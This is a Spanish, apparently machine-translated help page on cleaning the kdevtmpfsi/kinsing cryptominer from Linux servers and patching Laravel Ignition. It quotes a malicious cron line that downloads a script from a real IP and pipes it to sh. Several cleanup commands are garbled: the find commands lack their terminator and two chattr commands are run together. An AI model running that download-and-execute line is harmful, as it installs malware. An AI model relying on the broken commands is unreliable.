Saltar al contenido

kdevtmpfsi usando toda la CPU

Mantén la atención ya que en este artículo vas a hallar el arreglo que buscas.

Solución:

Lo enfrenté cara a cara después de instalar y ejecutar Flink Cluster. Parece que recibimos un ataque de un malware, que intenta usar la CPU de nuestro servidor para ejecutar el programa para extraer la moneda.

Mi solución es seguir los pasos:

  1. Mata el programa que se está ejecutando primero:

    • Correr htop y luego presione F9 para matar el programa. tenemos que matar kdevtmpfsi y kinsing así como.
  2. Elimine el archivo de malware que se ejecutará y usará toda la CPU (con mi centos 7)

    find / -iname kdevtmpfsi -exec rm -fv ;

    find / -iname kinsing -exec rm -fv ;

El resultado debería ser:

/tmp/kdevtmpfsi is removed
/var/tmp/kinsing is removed
  1. Crear un archivo con el mismo nombre:
  • touch /tmp/kdevtmpfsi && touch /var/tmp/kinsing

  • echo "kdevtmpfsi is fine now" > /tmp/kdevtmpfsi

  • echo "kinsing is fine now" > /var/tmp/kinsing

  • Ahora haga que dos archivos sean de solo lectura con el siguiente comando:

    chattr +i /tmp/kdevtmpfsichattr +i /var/tmp/kinsing

** Debe reiniciar su servidor. Si su problema está en un servidor remoto y se está conectando a él con un puerto específico, ¡puede cambiar al puerto ssh para aumentar la seguridad!

Tuve el mismo problema con Laravel en Centos 8. Estos son los pasos que seguí para eliminar el malware y parchear el sistema.


Eliminar el malware de los pasos del sistema:
Paso 1:

Eliminar el software malicioso:

Mata a los dos procesos (kdevtmpfsi y kinsing -Pueden estar en el mismo nombre pero con caracteres aleatorios al final-) usando htop o cualquier otro gestor de procesos.

Utilice lo siguiente para buscar y eliminar los archivos:

# find / -iname kdevtmpfsi* -exec rm -fv  ;
# find / -iname kinsing* -exec rm -fv  ;

La salida debería verse como:

removed '/tmp/kdevtmpfsi962782589'
removed '/tmp/kdevtmpfsi'
removed '/tmp/kinsing'
removed '/tmp/kinsing_oA1GECLm'

Paso 2:

Compruebe si hay un trabajo cron:

verifique si hay un trabajo cron que reinicializaría el malware.
Encontré el mío en: /var/spool/cron/apache

Incluía lo siguiente:
* * * * * wget -q -O - http://195.3.146.118/lr.sh | sh > /dev/null 2>&1

Paso 3:

Cree nuevos archivos y hágalos de solo lectura:

# touch /tmp/kdevtmpfsi && touch /tmp/kinsing
# echo "kdevtmpfsi is fine now" > /tmp/kdevtmpfsi
# echo "kinsing is fine now" > /tmp/kinsing
# chmod 0444 /tmp/kdevtmpfsi
# chmod 0444 /tmp/kinsing

Parcheando el proyecto Laravel:
Paso 1:

Apague APP_DEBUG:

asegúrese de que el APP_DEBUG attribute es false en .env porque así es como se accede a la vulnerabilidad.

Paso 2:

Actualizar encendido:

Actualizar encendido a una versión superior a 2.5.1 para asegurarse de que la vulnerabilidad está parcheada.
ejecute lo siguiente en la carpeta de su proyecto:

$ composer update facade/ignition

La solución mencionada aquí funcionó para nosotros. Básicamente, crea los archivos que usa el minero, sin ningún derecho, por lo que el minero no puede crearlos ni usarlos. https://github.com/docker-library/redis/issues/217

touch /tmp/kdevtmpfsi && touch /var/tmp/kinsing

echo "everything is good here" > /tmp/kdevtmpfsi

echo "everything is good here" > /var/tmp/kinsing

touch /tmp/zzz

echo "everything is good here" > /tmp/zzz

chmod go-rwx /var/tmp

chmod 1777 /tmp

Si tienes alguna cuestión y disposición de acrecentar nuestro división te recordamos ejecutar una aclaración y con gusto lo observaremos.

¡Haz clic para puntuar esta entrada!
(Votos: 0 Promedio: 0)



Utiliza Nuestro Buscador

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *